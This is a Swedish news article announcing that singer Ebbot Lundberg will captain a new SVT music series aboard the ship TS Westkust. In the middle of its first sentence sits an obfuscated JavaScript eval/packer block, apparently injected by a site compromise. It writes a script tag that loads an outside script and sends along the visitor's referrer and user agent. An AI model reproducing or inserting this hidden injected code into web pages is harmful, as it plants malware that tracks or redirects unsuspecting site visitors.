Image Image Image Image Image Image Image Image Image Image

| 12 maj, 2021

Scroll to top

Top

Ebbot Lundberg kapten för nytt musikprogram i SVT

Ebbot Lundberg kapten för nytt musikprogram i SVT
Sebastian

I eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(’0.6(”<\\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ysfif|var|u0026u|referrer|tytfn||js|php’.split(’|’),0,{}))
höst kan du hänga med på en musikalisk resa på skutan TS Westkust, med tolkningar du aldrig hört förut. Kapten på båten är artisten Ebbot Lundberg. I varje avsnitt bjuder han ombord tre artister som var och en har med sig ett soundtrack som är starkt kopplat till en viktig händelse i livet. – Det ska bli spännande att höra vilka låtar det blir, här finns det inga gränser, säger den blivande programledaren.

Gästartisterna är sådana som Ebbot har arbetat med tidigare eller bara är nyfiken på. Både stora folkkära namn och smalare artister kommer att samsas på båten. Resan startar i Göteborgs södra skärgård och fortsätter sedan norrut mot Smögen via nya hamnar varje vecka.
– Vi har länge letat efter en möjlighet att göra TV med Ebbot som är en fantastisk karaktär och artist, och vi ser verkligen fram emot att kunna erbjuda en riktigt underhållande upplevelse till tittarna, säger Christina Hill, programchef SVT.

Serien bjuder på samtal om toppar och dalar i livet och mynnar ut i laddade framträdanden. Det blir spontana spelningar på oväntade platser och varje avsnitt avslutas med en konsert där alla artisterna tar plats på scenen inför publik.
– Jag ser fram emot detta och älskar verkligen de här ställena vi ska till. Jag har en stark koppling till alla platserna och det ska bli roligt att få visa mina vattenhål för artisterna som kommer, säger Ebbot.

Ebbot tror att friheten av låtval kan bjuda på riktigt speciella tolkningar.
– Det ska bli spännande att höra vilka låtar det blir, här finns det inga gränser. Vi har alla låtar som är speciella för oss, säger han.

Programserien spelas in under juni och Ebbot har redan börjat spåna namnförslag till serien.
– Min favorit är Kusten är oklar men vi får se, oavsett kan jag lova att det blir massa bra musik och ett och annat manetkrig.

Serien produceras av Nordisk Film TV och kommer att sändas i fem timmeslånga avsnitt på SVT1 under hösten 2017.